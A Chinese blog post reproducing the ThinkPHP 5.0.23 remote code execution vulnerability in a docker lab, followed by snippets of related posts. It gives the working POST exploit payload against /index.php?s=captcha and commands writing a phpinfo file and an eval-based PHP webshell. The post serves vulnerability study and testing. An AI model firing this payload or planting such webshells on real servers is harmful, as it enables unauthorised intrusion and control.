Thinkphp5.0.23 rce(远程代码执行)的漏洞复现

ThinkPHP 5.0.23 RCE漏洞复现:远程代码执行风险剖析
原创 已于 2023-11-02 11:09:19 修改 · 2.1w 阅读 · 39 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #https #安全漏洞 #web

于 2021-12-08 16:22:12 首次发布
本文详细介绍了ThinkPHP框架5.0.23版本之前存在的远程代码执行漏洞,通过实例演示了如何利用该漏洞进行攻击,包括漏洞原理、利用步骤和在Kalidocker环境中复现的过程。技术萌新也可参考,期待大牛指导。

Thinkphp5.0.23 rce(远程代码执行)的漏洞复现

漏洞形成原因

  • 框架介绍:
    ThinkPHP是一款运用极广的PHP开发框架。
  • 漏洞引入:
    其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

漏洞如何利用

  • 1、访问靶机地址+端口号 进入首页
  • 2、Burp抓包修改传参方式为Post,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd为系统执行命令可进行一系列操作。

漏洞复现过程

  • Kali docker 容器中启动此漏洞环境
    在这里插入图片描述
  • 浏览器访问 Kali 的 ip 地址接上8080端口

在这里插入图片描述

  • Burp抓包修改传参方式为Post,url后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。
    在这里插入图片描述在这里插入图片描述
/index.php?s=captcha		#url后接

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd	#POST传入参数

  • Burp Go 在这里插入图片描述在这里插入图片描述

  • 尝试写入phpinfo

echo "<?php phpinfo(); ?>" > info.php

在这里插入图片描述

  • 成功!
    在这里插入图片描述
  • 写入一句话
echo '<?php eval($_POST[aaa]); ?>' > shell.php	#密码:aaa

在这里插入图片描述

thinkphp5.0.23rce复现
Cwillchris的博客
03-13 854
5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞。从图中可以看出,docker0网卡发生了错误,并且没有常见的IPV4,这里基本可以确定是docker的网络出现了问题 , 可以通过重置docker网络解决。可以发现docker的网卡正常了,并且通过物理机访问docker容器中的应用也已经正常。这样就掌握了漏洞利用的完整过程。启动环境,启动环境会先拉取镜像,网络不好可能会拉取不下来的。
HW漏洞集合()-thinkphp-yaml版
HWHXY的博客
03-31 1991
HW漏洞集合()-yml版 link:ThinkPHP漏洞总结 11. ThinkPHP 5.0.23远程代码执行 name: poc-yaml-thinkphp5023-method-rce rules: - method: POST path: /index.php?s=captcha headers: Content-Type: application/x-www-form-urlencoded body: | _method=__construc
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
[框架漏洞]ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析
Y4tacker的博客
02-12 2218
ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析 首先借用师傅的一张图来梳理一下流程 call_user_func调用system造成rce 梳理思路: $this->method可控导致可以调用__contruct()覆盖Request类的filter字段,然后App::run()执行判断debug来决定是否执行$request->param(),并且还有$dispatch['type'] 等于controller或者 method 时会执行$request->param(
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
Thinkphp5.0.23-rce漏洞复现
qq_64875725的博客
06-02 2831
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {
ThinkPHP5 5.0.23-rce远程代码执行漏洞复现
最新发布
A2893992091的博客
09-08 1328
其版本5中,由于框架对控制器名没有进行足够的检测,会导致在没有开启强制路由的情况下可执行任意方法,从而导致远程命令执行漏洞。通过echo命令写入 Webshell 文件,首先将一句话木马进行Base64 编码。判断是否存在漏洞:访问/index.php?s=captcha页面,会出现如下报错。切换目录到vulhub/thinkphp/5.0.23-rce下。使用HackBar 插件发送 POST 请求。端口为:8080,访问网站,搭建成功。访问shell.php,使用蚁剑连接。
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
然而,在 ThinkPHP 5.0.05.0.23 版本中存在一个 Remote Code Execution(RCE漏洞,该漏洞允许攻击者在服务器上执行任意代码。 该漏洞是由于 ThinkPHP 的路由机制存在缺陷,攻击者可以通过构造特殊的 URL 来...
ThinkPHP5 5.0.23 远程代码执行漏洞复现,python编写POC和EXP
wangqiao258的博客
10-05 1590
环境搭建: 使用vulhub,进入对应文件夹启动环境: [root@localhost ~]# cd /home/vulhub/thinkphp/5.0.23-rce/ [root@localhost 5.0.23-rce]# docker-compose up -d 查看端口: [root@localhost 5.0.23-rce]# docker ps CONTAINER ID IMAGE COMMAND CREATED
thinkphp v5.0.23 rce
qq_43647462的博客
08-23 3837
thinkphp v5.0.23 rce 复现 Buchiyexiao. thinkphp是一个轻量级的框架,其中在thinkphp5版本中出现了很多命令执行漏洞,本文分析采用的代码使用的是thinkphp版本v5.0.23(目的是匹配docker搭建的thinkphp环境的版本) 漏洞位置 thinkphp5的主要漏洞位置位于处理请求的Request类中,其中存在method方法,简单阅读发现该方法目的是为了获取当前的请求类型,因为我没有传入任何请求,所以get,post等的数组为空 其中var
ThinkPHP v5.0.23 核心版
10-05
ThinkPHP是一个开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,
thinkphp5.0.23
weixin_51558394的博客
08-17 1806
thinkphp 5.0.23远程代码执行
Thinkphp5.0.23远程代码执行漏洞复现
02-01 2531
Thinkphp5.0.23远程代码执行漏洞介绍、成因和复现
ThinkPHP--5.0.23-rce远程代码执行
m0_74402888的博客
05-03 1041
实现框架的核心类Requests的method方法实现表单请求类伪装,默认为$_POST[‘_method’]变量,却没有对_method属性进行严格校验,可以通过变量覆盖Requests类的属性,在结合框架特性实现对任意函数的调用实现任意代码执行。攻击者可向缓存文件内写入PHP代码,导致远程代码执行
thinkphp 5.0.23 rce漏洞复现
ffff5的博客
05-19 883
thinkphp 5.0.23 rce漏洞复现 thinkphp介绍 thinkphp是一个快速、兼容而且简单的轻量级国产php开发框架,支持windows/Unix/linux等服务器环境,并且有相当多的CMS是在thinkphp基础上二次开发的。 环境搭建 使用vulhub搭建环境,过程不赘述。 漏洞复现 抓包并直接发送下面的流量包,即可利用漏洞进行远程代码执行 POST /index.php?s=captcha HTTP/1.1 Host: IP:PORT Accept-Encoding: gzip,
Thinkphp 5.0.23 rce复现(新手)
nqzh001的博客
12-18 1529
今天学习使用docker复现Thinkphp 5.0.23 rce漏洞 使用docker配合Vulhub一键搭建漏洞测试靶场; Vulhub搭建地址 https://vulhub.org/#/docs/run/ 这边推荐使用Ubuntu,之前使用CentOS搭建总是出现各种错误。 搭建成功后,开始访问 直接上poc _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id 这个id就是想要
ThinkPHP5 5.0.23 远程代码执行漏洞
Yk_GSDN的博客
08-15 616
使用burpsuite抓包软件抓包。2、访问靶机ip+端口号8080。将 GET传参改为POST传参。
Thiinkphp 5.0.23-rce 漏洞复现(vulhub)
MDSEC的博客
08-22 449
形成原因是因为其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。这样thinkphp 5.0.23-rce漏洞复现完成了。2>.bp抓包修改post请求,传递参数。响应包状态码为500,但是可以访问页面。访问8080端口的本机地址。尝试写入phpinfo。
thinkphp5.0.23rce漏洞复现
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞...
评论 4
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值